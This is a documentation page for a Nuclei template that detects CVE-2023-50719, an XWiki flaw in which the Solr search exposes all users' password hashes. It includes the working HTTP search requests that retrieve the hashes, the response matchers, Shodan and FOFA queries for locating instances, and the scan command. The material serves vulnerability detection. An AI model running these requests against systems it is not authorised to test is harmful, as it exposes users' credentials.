XWiki < 4.10.15 - Sensitive Information Disclosure
ID: CVE-2023-50719
Severity: high
Author: ritikchaddha
Tags: cve,cve2024,xwiki,password,exposure
Description
Section titled “Description”XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren’t accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability.
YAML Source
Section titled “YAML Source”id: CVE-2023-50719
info: name: XWiki < 4.10.15 - Sensitive Information Disclosure author: ritikchaddha severity: high description: | XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren't accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability. impact: | Successful exploitation could lead to disclosure of the password hashes of all users. remediation: | This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. reference: - https://jira.xwiki.org/browse/XWIKI-21208 - https://nvd.nist.gov/vuln/detail/CVE-2023-50719 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2023-50719 cwe-id: CWE-359 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: max-request: 2 verified: true vendor: xwiki product: xwiki shodan-query: html:"data-xwiki-reference" fofa-query: body="data-xwiki-reference" tags: cve,cve2024,xwiki,password,exposure
http: - method: GET path: - "{{BaseURL}}/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale=" - "{{BaseURL}}/xwiki/bin/view/Main/Search?r=1&text=propertyvalue%3A%3F*%20AND%20reference%3A*.password&f_locale=en&f_locale="
stop-at-first-match: true
matchers-condition: and matchers: - type: word part: body words: - "hash:SHA</span>" - "XWikiUsers[0].password" condition: and
- type: status status: - 200# digest: 4a0a00473045022100f7c45a29b4e3080ab52486ca48f1f7c7ffb638bd577db4218bf60b8ddf0003a50220584839ec5dd7b28483641b17acc6e088ceba80d9002054229937f0c2a0347977:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-50719.yaml"